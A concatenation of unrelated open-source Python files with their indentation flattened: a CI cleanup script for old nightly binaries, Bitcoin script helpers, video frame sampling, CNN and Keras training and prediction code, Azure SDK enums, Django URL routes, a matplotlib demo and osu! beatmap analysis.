depths[:,0] *= 2**(2*torch.rand(1) - 1.0).cuda()
images1 = normalize_images(images)
ests, _ = model(Gs, images1, depths, intrinsics, num_steps=12)
# only care about last transformation
Gs = ests[-1]
T = Gs[:,0] * Gs[:,1].inv()
T = T[0].matrix().double().cpu().numpy()
sim3_visualization(T, images, depths, intrinsics)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--transformation', default='SE3', help='checkpoint to restore')
parser.add_argument('--ckpt', help='checkpoint to restore')
args = parser.parse_args()
model = Sim3Net(args)
model.load_state_dict(torch.load(args.ckpt))
model.cuda()
model.eval()
# run two demos
demo(model, 0)
demo(model, 1)
|
ci/delete_old_binaries.py | NoahR02/Odin | 2,690 | 12775751 | import subprocess
import sys
import json
import datetime
import urllib.parse
import sys
def main():
files_by_date = {}
bucket = sys.argv[1]
days_to_keep = int(sys.argv[2])
print(f"Looking for binaries to delete older than {days_to_keep} days")
files_lines = execute_cli(f"b2 ls --long --versions {bucket} nightly").split("\n")
for x in files_lines:
parts = [y for y in x.split(' ') if y]
if parts and parts[0]:
date = datetime.datetime.strptime(parts[2], '%Y-%m-%d').replace(hour=0, minute=0, second=0, microsecond=0)
now = datetime.datetime.utcnow().replace(hour=0, minute=0, second=0, microsecond=0)
delta = now - date
if delta.days > days_to_keep:
print(f'Deleting {parts[5]}')
execute_cli(f'b2 delete-file-version {parts[0]}')
def execute_cli(command):
sb = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
return sb.stdout.read().decode("utf-8");
if __name__ == '__main__':
sys.exit(main())
|
pybitcoin/transactions/scripts.py | sea212/pybitcoin | 220 | 12775755 | <filename>pybitcoin/transactions/scripts.py
# -*- coding: utf-8 -*-
"""
pybitcoin
~~~~~
:copyright: (c) 2014 by Halfmoon Labs
:license: MIT, see LICENSE for more details.
"""
from .opcodes import *
from .utils import count_bytes
from ..constants import MAX_BYTES_AFTER_OP_RETURN
from ..b58check import b58check_decode, b58check_encode
from binascii import hexlify, unhexlify
from utilitybelt import is_hex
def script_to_hex(script):
""" Parse the string representation of a script and return the hex version.
Example: "OP_DUP OP_HASH160 c629...a6db OP_EQUALVERIFY OP_CHECKSIG"
"""
hex_script = ''
parts = script.split(' ')
for part in parts:
if part[0:3] == 'OP_':
try:
hex_script += '%0.2x' % eval(part)
except:
raise Exception('Invalid opcode: %s' % part)
elif isinstance(part, (int)):
hex_script += '%0.2x' % part
elif is_hex(part):
hex_script += '%0.2x' % count_bytes(part) + part
else:
raise Exception('Invalid script - only opcodes and hex characters allowed.')
return hex_script
def make_pay_to_address_script(address):
""" Takes in an address and returns the script
"""
hash160 = hexlify(b58check_decode(address))
script_string = 'OP_DUP OP_HASH160 %s OP_EQUALVERIFY OP_CHECKSIG' % hash160
return script_to_hex(script_string)
def make_op_return_script(data, format='bin'):
""" Takes in raw ascii data to be embedded and returns a script.
"""
if format == 'hex':
assert(is_hex(data))
hex_data = data
elif format == 'bin':
hex_data = hexlify(data)
else:
raise Exception("Format must be either 'hex' or 'bin'")
num_bytes = count_bytes(hex_data)
if num_bytes > MAX_BYTES_AFTER_OP_RETURN:
raise Exception('Data is %i bytes - must not exceed 40.' % num_bytes)
script_string = 'OP_RETURN %s' % hex_data
return script_to_hex(script_string)
|
vectorhub/encoders/video/sampler.py | boba-and-beer/vectorhub | 385 | 12775798 | <gh_stars>100-1000
from math import ceil
import numpy as np
import os
import tempfile
from ...import_utils import *
if is_all_dependency_installed('encoders-video'):
import librosa
import soundfile as sf
from cv2 import cv2
from moviepy.video.io.ffmpeg_reader import ffmpeg_parse_infos
from moviepy.video.io.VideoFileClip import VideoFileClip
class FrameSamplingFilter():
def __init__(self, every=None, hertz=None, top_n=None):
if every is None and hertz is None and top_n is None:
raise ValueError("When initializing the FrameSamplingFilter, "
"one of the 'every', 'hertz', or 'top_n' must "
"be specified.")
self.every = every
self.hertz = hertz
self.top_n = top_n
def get_audio_sampling_rate(self, filename: str):
infos = ffmpeg_parse_infos(filename)
fps = infos.get('audio_fps', 44100)
if fps == 'unknown':
fps = 44100
return fps
def load_clip(self, filename: str):
audio_fps = self.get_audio_sampling_rate(filename)
self.clip = VideoFileClip(filename, audio_fps)
def initialize_video(self, filename: str):
self.filename = filename
self.load_clip(filename)
self.fps = self.clip.fps
self.width = self.clip.w
self.height = self.clip.h
self.frame_index = range(int(ceil(self.fps * self.clip.duration)))
self.duration = self.clip.duration
self.n_frames = len(self.frame_index)
def get_audio_vector(self, new_sampling_rate: int = 16000):
fd, fp = tempfile.mkstemp()
audio = f'{fp}.wav'
self.clip.audio.to_audiofile(audio)
data, sampling_rate = sf.read(audio, dtype='float32')
os.close(fd)
os.remove(audio)
return np.array(librosa.resample(data.T, sampling_rate, new_sampling_rate))
def transform(self, filename: str):
self.initialize_video(filename)
if (self.every is not None):
new_idx = range(self.n_frames)[::self.every]
elif (self.hertz is not None):
interval = self.fps / float(self.hertz)
new_idx = np.arange(0, self.n_frames, interval).astype(int)
new_idx = list(new_idx)
elif self.top_n is not None:
diffs = []
for i, img in enumerate(range(self.n_frames)):
if i == 0:
last = img
continue
pixel_diffs = cv2.sumElems(cv2.absdiff(
self.get_frame(last), self.get_frame(img)))
diffs.append(sum(pixel_diffs))
last = img
new_idx = sorted(range(len(diffs)),
key=lambda i: diffs[i],
reverse=True)[:self.top_n]
result = []
for index in new_idx:
result.append(self.get_frame(index))
return result
def get_frame(self, index: int):
return self.clip.get_frame(index)
def iter_frames(self):
for i, f in enumerate(self.frame_index):
yield self.get_frame(f)
|
cnn_train.py | sg-nm/Operation-wise-attention-network | 102 | 12775864 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
from torch.utils.data import DataLoader
import torchvision.transforms as transforms
import torchvision.utils as vutils
from torch.autograd import Variable
from skimage.measure import compare_psnr as ski_psnr
from skimage.measure import compare_ssim as ski_ssim
import os
import csv
import logging
from model import Network
import torch.nn.functional as F
from data_load_own import get_training_set, get_test_set
from data_load_mix import get_dataset_deform
import utils
class CNN_train():
def __init__(self, dataset_name, imgSize=63, batchsize=32):
self.imgSize = imgSize
self.batchsize = batchsize
self.dataset_name = dataset_name
# load dataset
if dataset_name == 'mix' or dataset_name == 'yourdata':
if dataset_name == 'mix':
self.num_work = 8
train_dir = '/dataset/train/'
val_dir = '/dataset/val/'
test_dir = '/dataset/test/'
train_set = get_dataset_deform(train_dir, val_dir, test_dir, 0)
val_set = get_dataset_deform(train_dir, val_dir, test_dir, 1)
# test_set = get_dataset_deform(train_dir, val_dir, test_dir, 2)
self.dataloader = DataLoader(dataset=train_set, num_workers=self.num_work, batch_size=self.batchsize, shuffle=True, pin_memory=True)
self.val_loader = DataLoader(dataset=val_set, num_workers=self.num_work, batch_size=1, shuffle=False, pin_memory=False)
# self.test_dataloader = DataLoader(dataset=test_set, num_workers=self.num_work, batch_size=1, shuffle=False, pin_memory=False)
elif dataset_name == 'yourdata':
self.num_work = 8
# Specify the path of your data
train_input_dir = '/dataset/yourdata_train/input/'
train_target_dir = '/dataset/yourdata_train/target/'
test_input_dir = '/dataset/yourdata_test/input/'
test_target_dir = '/dataset/yourdata_test/target/'
train_set = get_training_set(train_input_dir, train_target_dir, True)
test_set = get_training_set(test_input_dir, test_target_dir, False)
self.dataloader = DataLoader(dataset=train_set, num_workers=self.num_work, batch_size=self.batchsize, shuffle=True, drop_last=True)
self.test_dataloader = DataLoader(dataset=test_set, num_workers=self.num_work, batch_size=1, shuffle=False)
else:
print('\tInvalid input dataset name at CNN_train()')
exit(1)
def __call__(self, cgp, gpuID, epoch_num=150, gpu_num=1):
print('GPUID :', gpuID)
print('epoch_num:', epoch_num)
# define model
torch.manual_seed(2018)
torch.cuda.manual_seed(2018)
torch.backends.cudnn.benchmark = True
torch.backends.cudnn.enabled = True
L1_loss = nn.L1Loss()
L1_loss = L1_loss.cuda(gpuID)
model = Network(16, 10, L1_loss, gpuID=gpuID)
if gpu_num > 1:
device_ids = [i for i in range(gpu_num)]
model = torch.nn.DataParallel(model, device_ids=device_ids)
model = model.cuda(gpuID)
logging.info("param size = %fMB", utils.count_parameters_in_MB(model))
print('Param:', utils.count_parameters_in_MB(model))
optimizer = optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999))
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=epoch_num)
test_interval = 5
# for output images
if not os.path.exists('./results'):
os.makedirs('./results/Inputs')
os.makedirs('./results/Outputs')
os.makedirs('./results/Targets')
# Train loop
for epoch in range(1, epoch_num+1):
scheduler.step()
start_time = time.time()
print('epoch', epoch)
train_loss = 0
for module in model.children():
module.train(True)
for ite, (input, target) in enumerate(self.dataloader):
lr_patch = Variable(input, requires_grad=False).cuda(gpuID)
hr_patch = Variable(target, requires_grad=False).cuda(gpuID)
optimizer.zero_grad()
output = model(lr_patch)
l1_loss = L1_loss(output, hr_patch)
l1_loss.backward()
optimizer.step()
train_loss += l1_loss.item()
if ite % 500 == 0:
vutils.save_image(lr_patch.data, './input_sample%d.png' % gpuID, normalize=False)
vutils.save_image(hr_patch.data, './target_sample%d.png' % gpuID, normalize=False)
vutils.save_image(output.data, './output_sample%d.png' % gpuID, normalize=False)
print('Train set : Average loss: {:.4f}'.format(train_loss))
print('time ', time.time()-start_time)
# check val/test performance
if epoch % test_interval == 0:
with torch.no_grad():
print('------------------------')
for module in model.children():
module.train(False)
test_psnr = 0
test_ssim = 0
eps = 1e-10
test_ite = 0
for _, (input, target) in enumerate(self.val_loader):
lr_patch = Variable(input, requires_grad=False).cuda(gpuID)
hr_patch = Variable(target, requires_grad=False).cuda(gpuID)
output = model(lr_patch)
# save images
vutils.save_image(output.data, './results/Outputs/%05d.png' % (int(i)), padding=0, normalize=False)
vutils.save_image(lr_patch.data, './results/Inputs/%05d.png' % (int(i)), padding=0, normalize=False)
vutils.save_image(hr_patch.data, './results/Targets/%05d.png' % (int(i)), padding=0, normalize=False)
# Calculation of SSIM and PSNR values
output = output.data.cpu().numpy()[0]
output[output>1] = 1
output[output<0] = 0
output = output.transpose((1,2,0))
hr_patch = hr_patch.data.cpu().numpy()[0]
hr_patch[hr_patch>1] = 1
hr_patch[hr_patch<0] = 0
hr_patch = hr_patch.transpose((1,2,0))
# SSIM
test_ssim+= ski_ssim(output, hr_patch, data_range=1, multichannel=True)
# PSNR
imdf = (output - hr_patch) ** 2
mse = np.mean(imdf) + eps
test_psnr+= 10 * math.log10(1.0/mse)
test_ite += 1
test_psnr /= (test_ite)
test_ssim /= (test_ite)
print('Valid PSNR: {:.4f}'.format(test_psnr))
print('Valid SSIM: {:.4f}'.format(test_ssim))
f = open('PSNR.txt', 'a')
writer = csv.writer(f, lineterminator='\n')
writer.writerow([epoch, test_psnr, test_ssim])
f.close()
print('------------------------')
torch.save(model.state_dict(), './model_%d.pth' % int(epoch))
return train_loss
|
sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_05_10/models/_resource_management_client_enums.py | rsdoherty/azure-sdk-for-python | 2,728 | 12775874 | <reponame>rsdoherty/azure-sdk-for-python<filename>sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_05_10/models/_resource_management_client_enums.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class DeploymentMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The mode that is used to deploy resources. This value can be either Incremental or Complete. In
Incremental mode, resources are deployed without deleting existing resources that are not
included in the template. In Complete mode, resources are deployed and existing resources in
the resource group that are not included in the template are deleted. Be careful when using
Complete mode as you may unintentionally delete resources.
"""
INCREMENTAL = "Incremental"
COMPLETE = "Complete"
class OnErrorDeploymentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The deployment on error behavior type. Possible values are LastSuccessful and
SpecificDeployment.
"""
LAST_SUCCESSFUL = "LastSuccessful"
SPECIFIC_DEPLOYMENT = "SpecificDeployment"
class ResourceIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The identity type.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
USER_ASSIGNED = "UserAssigned"
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned, UserAssigned"
NONE = "None"
|
wouso/games/challenge/urls.py | AlexandruGhergut/wouso | 117 | 12775921 | <gh_stars>100-1000
from django.conf.urls.defaults import *
urlpatterns = patterns('wouso.games.challenge.views',
url(r'^$', 'index', name='challenge_index_view'),
url(r'^(?P<id>\d+)/$', 'challenge', name='view_challenge'),
url(r'^launch/(?P<to_id>\d+)/$', 'launch', name='challenge_launch'),
url(r'^refuse/(?P<id>\d+)/$', 'refuse', name='challenge_refuse'),
url(r'^accept/(?P<id>\d+)/$', 'accept', name='challenge_accept'),
url(r'^cancel/(?P<id>\d+)/$', 'cancel', name='challenge_cancel'),
url(r'^setplayed/(?P<id>\d+)/$', 'setplayed', name='setplayed'),
url(r'^use_artifact/$', 'use_one_more', name='challenge_onemore'),
url(r'^history/(?P<playerid>\d+)/$', 'history', name='challenge_history'),
url(r'^playerchallenge/$', 'challenge_player', name='challenge_player'),
url(r'^randomchallenge/$', 'challenge_random', name='challenge_random'),
url(r'^stats/$', 'challenge_stats', name='challenge_stats'),
url(r'^stats/player=(?P<player_id>\d+)/$', 'challenge_stats', name='challenge_stats'),
url(r'^stats/target=(?P<target_id>\d+)/', 'detailed_challenge_stats',
name='detailed_challenge_stats'),
url(r'^stats/player=(?P<player_id>\d+)/target=(?P<target_id>\d+)/', 'detailed_challenge_stats',
name='detailed_challenge_stats'),
)
|
extraPackages/matplotlib-3.0.3/examples/lines_bars_and_markers/vline_hline_demo.py | dolboBobo/python3_ios | 130 | 12775943 | <reponame>dolboBobo/python3_ios
"""
=================
hlines and vlines
=================
This example showcases the functions hlines and vlines.
"""
import matplotlib.pyplot as plt
import numpy as np
t = np.arange(0.0, 5.0, 0.1)
s = np.exp(-t) + np.sin(2 * np.pi * t) + 1
nse = np.random.normal(0.0, 0.3, t.shape) * s
fig, (vax, hax) = plt.subplots(1, 2, figsize=(12, 6))
vax.plot(t, s + nse, '^')
vax.vlines(t, [0], s)
# By using ``transform=vax.get_xaxis_transform()`` the y coordinates are scaled
# such that 0 maps to the bottom of the axes and 1 to the top.
vax.vlines([1, 2], 0, 1, transform=vax.get_xaxis_transform(), colors='r')
vax.set_xlabel('time (s)')
vax.set_title('Vertical lines demo')
hax.plot(s + nse, t, '^')
hax.hlines(t, [0], s, lw=2)
hax.set_xlabel('time (s)')
hax.set_title('Horizontal lines demo')
plt.show()
|
v7.0/map_analyze.py | jsstwright/osumapper | 296 | 12775982 | # -*- coding: utf-8 -*-
#
# JSON osu! map analysis
#
import numpy as np;
def get_map_timing_array(map_json, length=-1, divisor=4):
if length == -1:
length = map_json["obj"][-1]["time"] + 1000; # it has an extra time interval after the last note
if map_json["obj"][-1]["type"] & 8: # spinner end
length = map_json["obj"][-1]["spinnerEndTime"] + 1000;
uts_a = map_json["timing"]["uts"];
out = [];
for i, uts in enumerate(uts_a):
begin_time = uts["beginTime"];
mspb = uts["tickLength"];
if i < len(uts_a)-1:
end_time = uts_a[i+1]["beginTime"];
else:
end_time = length;
arr = np.floor(np.arange(begin_time, end_time, mspb / divisor));
out = out + list(map(lambda f: int(f), arr));
return out;
def get_tick_len(map_json, tick):
uts_a = map_json["timing"]["uts"];
if tick < uts_a[0]["beginTime"]:
return uts_a[0]["tickLength"];
_out = 600;
for uts in uts_a:
if tick >= uts["beginTime"]:
_out = uts["tickLength"];
else:
return _out;
return _out;
def get_slider_len(map_json, tick):
ts_a = map_json["timing"]["ts"];
if tick < ts_a[0]["beginTime"]:
return ts_a[0]["sliderLength"];
_out = 100;
for ts in ts_a:
if tick >= ts["beginTime"]:
_out = ts["sliderLength"];
else:
return _out;
return _out;
def get_slider_len_ts(ts_a, tick):
if tick < ts_a[0]["beginTime"]:
return ts_a[0]["sliderLength"];
_out = 100;
for ts in ts_a:
if tick >= ts["beginTime"]:
_out = ts["sliderLength"];
else:
return _out;
return _out;
def get_end_time(note):
if note["type"] & 8:
return note["spinnerEndTime"];
elif note["type"] & 2:
return note["sliderData"]["endTime"];
#elif note["type"] & 128:
# return note["holdEndTime"];
else:
return note["time"];
# edited from uts to ts
def get_all_ticks_and_lengths_from_ts(uts_array, ts_array, end_time, divisor=4):
# Returns array of all timestamps, ticklens and sliderlens.
endtimes = ([uts["beginTime"] for uts in uts_array] + [end_time])[1:];
timestamps = [np.arange(uts["beginTime"], endtimes[i], uts["tickLength"] / divisor) for i, uts in enumerate(uts_array)];
ticks_from_uts = [list(range(len(timestamp_group))) for timestamp_group in timestamps];
tick_len = [[uts["tickLength"]] * len(np.arange(uts["beginTime"], endtimes[i], uts["tickLength"] / divisor)) for i, uts in enumerate(uts_array)];
# slider_len = [[ts["sliderLength"]] * len(np.arange(ts["beginTime"], endtimes[i], ts["tickLength"] / divisor)) for i, ts in enumerate(ts_array)];
slider_len = [get_slider_len_ts(ts_array, timestamp) for timestamp in np.concatenate(timestamps)];
return np.concatenate(ticks_from_uts), np.round(np.concatenate(timestamps)).astype(int), np.concatenate(tick_len), np.array(slider_len);
def get_end_point(note):
if note["type"] & 8:
return np.array([256, 192]);
elif note["type"] & 2:
return np.array(note["sliderData"]["endpoint"]);
else:
return np.array([note["x"], note["y"]]);
def get_input_vector(note, prev_note):
if note["type"] & 8:
return None;
#elif note["type"] & 2:
# return np.array(note["sliderData"]["dIn"]);
else:
vec = np.array([note["x"], note["y"]]) - get_end_point(prev_note);
return vec / max(0.001, np.sqrt(vec.dot(vec)));
def get_output_vector(note, prev_note):
if note["type"] & 8:
return None;
elif note["type"] & 2:
return np.array(note["sliderData"]["dOut"]);
else:
vec = np.array([note["x"], note["y"]]) - get_end_point(prev_note);
return vec / max(0.001, np.sqrt(vec.dot(vec)));
def get_momentum(note, prev_note, slider_len):
"""
momentum = distance snap (distance / slider length).
for sliders, takes small value between from slider end or slider start to next note.
"""
v1 = np.array([note["x"], note["y"]]);
v0 = get_end_point(prev_note);
v = v1 - v0;
if note["time"] - get_end_time(prev_note) == 0 or note["time"] - prev_note["time"] == 0:
# it has the same time the previous note ends. either a bugged sliderend or a double note
return 0;
end_type_momentum = np.sqrt(v.dot(v)) / (note["time"] - get_end_time(prev_note)) / slider_len;
# Since slider jumps in maps cause parameters to be learned too high
# we try to deal with slider leniency by using the beginning of slider
v2 = np.array([prev_note["x"], prev_note["y"]]);
v3 = v1 - v2;
start_type_momentum = np.sqrt(v3.dot(v3)) / (note["time"] - prev_note["time"]) / slider_len;
return np.min([end_type_momentum, start_type_momentum]);
def is_uts_begin(map_json, tick):
uts_a = map_json["timing"]["uts"];
begin_times = [uts["beginTime"] for uts in uts_a];
for t in begin_times:
if tick > t - 1 and tick < t + 5:
return True
return False
def get_map_notes(map_json, **kwargs):
"""
Reads JSON map data and creates a list for every tick
Returns:
data = list of data array: [TICK, TIME, NOTE, NOTE_TYPE, SLIDING, SPINNING, MOMENTUM, Ex1, Ex2, Ex3]
flow_data = list of data array: [i, tick, note_type, x, y, vec_in_x, vec_in_y, vec_out_x, vec_out_y, end_x, end_y]
Ex1, Ex2, Ex3 = tickLength/500, BPM/120, sliderLength/150
"""
length = kwargs.get("length", -1);
divisor = kwargs.get("divisor", 4);
tick_times = get_map_timing_array(map_json, length = length, divisor = divisor);
objs = map_json["obj"];
obj_times = list(map(lambda obj: obj["time"], objs));
# 1 for circle, 2 for slider, 3 for spinner
def get_note_type(obj):
if not obj:
return 0;
if obj["type"] & 2:
return 2;
elif obj["type"] & 8:
return 3;
return 1;
po = 0;
note_max_wait_time = kwargs.get("note_max_wait_time", 1000);
start_time = obj_times[0] - note_max_wait_time;
last_obj_time = start_time;
sliding = 0;
slider_end_time = 0;
spinning = 0;
spinner_end_time = 0;
data = [];
flow_data = [];
# constant multipliers and subtractions
tlen_mp = 1/500;
tlen_s = 1;
bpm_mp = 1/120;
bpm_s = 1;
slen_mp = 1/150;
slen_s = 1;
# tick count from start of uninherited timing section
uts_i = 0;
# tick is timestamp here
for i, tick in enumerate(tick_times):
if is_uts_begin(map_json, tick):
uts_i = 0;
else:
uts_i += 1;
# Attach extra vars at the end of each note data row
tlen = get_tick_len(map_json, tick);
bpm = 60000 / tlen;
slen = get_slider_len(map_json, tick);
ex1 = tlen * tlen_mp - tlen_s;
ex2 = bpm * bpm_mp - bpm_s;
ex3 = slen * slen_mp - slen_s;
while obj_times[po] < tick - 5 and po < len(obj_times) - 1:
po += 1;
if obj_times[po] >= tick - 5 and obj_times[po] <= tick + 5: # found note
last_obj_time = tick;
note_type = get_note_type(objs[po]);
# calculate momentum
if po >= 1:
momentum = get_momentum(objs[po], objs[po-1], slen/tlen);
else:
momentum = 0;
# flow data
if po >= 1:
input_vector = get_input_vector(objs[po], objs[po-1]);
output_vector = get_output_vector(objs[po], objs[po-1]);
else:
input_vector = [0, 0];
output_vector = [0, 0];
if input_vector is None or input_vector[0] is None or input_vector[1] is None:
input_vector = [0, 0];
if output_vector is None or output_vector[0] is None or output_vector[1] is None:
output_vector = [0, 0];
# end point
endpoint = get_end_point(objs[po]);
flow_data.append([uts_i, tick, note_type, objs[po]["x"], objs[po]["y"], input_vector[0], input_vector[1], output_vector[0], output_vector[1], endpoint[0], endpoint[1]]);
# put data
if note_type == 1:
spinning = 0;
sliding = 0;
elif note_type == 2:
sliding = 1;
slider_end_time = objs[po]["sliderData"]["endTime"];
elif note_type == 3:
spinning = 1;
spinner_end_time = objs[po]["spinnerEndTime"];
# because the spinner sometimes get over 3 secs
last_obj_time = spinner_end_time;
# TICK, TIME, NOTE, NOTE_TYPE, SLIDING, SPINNING, MOMENTUM, Ex1, Ex2, Ex3
data.append([uts_i, tick, 1, note_type, sliding, spinning, momentum, ex1, ex2, ex3]);
elif spinning == 1:
if tick >= spinner_end_time - 5:
spinning = 0;
data.append([uts_i, tick, 1, 5, 0, 0, 0, ex1, ex2, ex3]);
else:
data.append([uts_i, tick, 0, 0, 0, 1, 0, ex1, ex2, ex3]);
elif sliding == 1:
if tick >= slider_end_time - 5:
sliding = 0;
data.append([uts_i, tick, 1, 4, 0, 0, 0, ex1, ex2, ex3]);
else:
data.append([uts_i, tick, 0, 0, 1, 0, 0, ex1, ex2, ex3]);
else: # not found
if tick - last_obj_time < note_max_wait_time and tick >= start_time:
data.append([uts_i, tick, 0, 0, 0, 0, 0, ex1, ex2, ex3]);
return data, flow_data; |
extra/test_multi.py | ragnariock/DeepFashion | 255 | 12775984 | ### IMPORTS
from __future__ import print_function
import os
import fnmatch
import numpy as np
import skimage.data
import cv2
import sys
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from PIL import Image
from keras import applications
from keras.preprocessing.image import ImageDataGenerator
from keras import optimizers
from keras.optimizers import RMSprop, Adagrad
from keras.models import Sequential, Model
from keras.layers import Dropout, Flatten, Dense, Input
from keras.callbacks import ModelCheckpoint, CSVLogger, TensorBoard, EarlyStopping
import logging
FORMAT = "[%(lineno)4s : %(funcName)-30s ] %(message)s"
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
from selective_search import selective_search_bbox
### GLOBALS
# dimensions of our images.
# img_width = 150
# img_height = 150
img_width = 224
img_height = 224
# dataset_path = 'dataset_dogs_cats'
dataset_path = 'dataset'
dataset_train_path=os.path.join(dataset_path, 'train')
dataset_val_path=os.path.join(dataset_path, 'validation')
dataset_test_path=os.path.join(dataset_path, 'test')
# path to the model weights files.
weights_path = 'weights/vgg16_weights.h5'
#top_model_weights_path = 'output/bottleneck_fc_model.h5'
#top_model_weights_path = 'output_6_categ/best-weights-015-0.5636-0.7923.hdf5'
#finetune_model_weights_path = 'output/finetune_bottleneck_fc_model.h5'
#finetune_model_weights_path = 'output_6_categ/best-weights-finetune-000-0.2325-0.9062.hdf5'
#finetune_model_weights_path = 'output_6_categ_crop/best-weights-finetune-008-0.3453-0.8774.hdf5'
#finetune_model_weights_path = 'output/best-weights-finetune-000-1.5646-0.5217.hdf5'
#finetune_model_weights_path = 'results_36categ/best-weights-finetune-000-1.5646-0.5217.hdf5'
finetune_model_weights_path = 'output/finetune_bottleneck_fc_model.h5'
#epochs = 50
epochs = 5
#batch_size = 16
#batch_size = 32
batch_size = 1
# Count no. of images(.jpg) in a directory
def get_images_count_recursive(path):
matches = []
logging.debug('path {}'.format(path))
for root, dirnames, filenames in os.walk(path):
for filename in fnmatch.filter(filenames, '*.jpg'):
matches.append(os.path.join(root, filename))
# logging.debug('matches {}'.format(matches))
images_count = len(matches)
return images_count
nb_test_samples = get_images_count_recursive(dataset_test_path)
logging.debug('nb_test_samples {}'.format(nb_test_samples))
if not os.path.exists('output'):
os.makedirs('output')
if not os.path.exists('logs'):
os.makedirs('logs')
# TODO: HARDCODING - Should be same as used during training VGG; Else error (None, None, 512)
input_shape = (img_width, img_height, 3)
# Sorted subdirectories list
def get_subdir_list(path):
names=[]
for name in sorted(os.listdir(path)):
if os.path.isdir(os.path.join(path, name)):
names.append(name)
logging.debug('names {}'.format(names))
return names
class_names = get_subdir_list(dataset_train_path)
logging.debug('class_names {}'.format(class_names))
# build the VGG16 network
base_model = applications.VGG16(weights='imagenet', include_top=False, input_shape=input_shape)
logging.debug('Model loaded.')
logging.debug('{}'.format(base_model.output_shape)) # (None, None, None, 512) if input_shape not given in applications.VGG16
logging.debug('{}'.format(base_model.output_shape[1:])) # (None, None, 512)
### MODEL 1
# build a classifier model to put on top of the convolutional model
# top_model = Sequential()
# top_model.add(Flatten(input_shape=base_model.output_shape[1:]))
# top_model.add(Dense(256, activation='relu'))
# top_model.add(Dropout(0.5))
# top_model.add(Dense(len(class_names), activation='softmax')) # Binary to Multi classification changes
# #top_model.add(Dense(1, activation='sigmoid'))
# # note that it is necessary to start with a fully-trained
# # classifier, including the top classifier,
# # in order to successfully do fine-tuning
# # top_model.load_weights(top_model_weights_path)
# # add the model on top of the convolutional base
# # base_model.add(top_model) # Not working; AttributeError: 'Model' object has no attribute 'add'
# model = Model(inputs=base_model.input, outputs=top_model(base_model.output))
# logging.debug('{}'.format(model.summary()))
# model.compile(loss='sparse_categorical_crossentropy',
# optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),
# metrics=['accuracy'])
### MODEL2
inputs = Input(shape=(base_model.output_shape[1:]))
x_common = Dense(256, activation='relu')(inputs)
## Model Classification
x = Flatten()(x_common)
#x = Dropout(dropout_rate)(x)
predictions_class = Dense(len(class_names), activation='softmax', name='predictions_class')(x)
## Model (Regression) IOU score
x = Flatten()(x_common)
# x = Dense(256, activation='relu')(x)
# x = Dropout(dropout_rate)(x)
predictions_iou = Dense(1, activation='sigmoid', name='predictions_iou')(x)
# This creates a model that includes the Input layer and three Dense layers
#model = Model(inputs=inputs, outputs=[predictions_class(base_model.output), predictions_iou(base_model.output)])
model = Model(inputs=inputs, outputs=[predictions_class(base_model.output), predictions_iou])
logging.debug('model summary {}'.format(model.summary()))
model.compile(optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),
loss={'predictions_class': 'sparse_categorical_crossentropy', 'predictions_iou': 'mean_squared_error'},
metrics=['accuracy'])
model.load_weights(finetune_model_weights_path)
logging.debug('weights loaded: {}'.format(finetune_model_weights_path))
def evaluate_test_dataset():
## Test
test_datagen = ImageDataGenerator(rescale=1. / 255)
test_generator = test_datagen.flow_from_directory(
dataset_test_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='sparse', # Binary to Multi classification changes
save_to_dir=None,
shuffle=False)
scores = model.evaluate_generator(test_generator, nb_test_samples // batch_size)
logging.debug('model.metrics_names {}'.format(model.metrics_names))
logging.debug('scores {}'.format(scores))
def predict_image_dir():
# Predict
# TODO: Hardcoding
# Put all images in sample_images/test folder
dataset_predict_path='sample_images'
#dataset_predict_path='temp'
logging.debug('dataset_predict_path {}'.format(dataset_predict_path))
predict_datagen = ImageDataGenerator(rescale=1. / 255)
predict_generator = predict_datagen.flow_from_directory(
dataset_predict_path,
target_size=(img_height, img_width),
batch_size=batch_size,
class_mode='sparse', # Binary to Multi classification changes
save_to_dir=None,
shuffle=False)
nb_predict_samples = get_images_count_recursive(dataset_predict_path)
logging.debug('nb_predict_samples {}'.format(nb_predict_samples))
prediction = model.predict_generator(predict_generator, nb_predict_samples // batch_size, verbose=1)
logging.debug('\n\nprediction \n{}'.format(prediction))
# Display predictions
matches=[]
for root, dirnames, filenames in os.walk(os.path.join(dataset_predict_path,'test')):
for filename in fnmatch.filter(filenames, '*.jpg'):
matches.append(os.path.join(root, filename))
for index,preds in enumerate(prediction):
logging.debug('\n{}'.format((matches[index])))
for index2, pred in enumerate(preds):
logging.debug('class_names {}'.format(class_names[index2]))
logging.debug('pred {0:6f}'.format(float(pred)))
def pad_and_crop_image(old_im, new_width, new_height):
# old_im = Image.open('someimage.jpg')
old_size = old_im.size
new_size = (new_width, new_height)
new_im = Image.new("RGB", new_size) # this is already black!
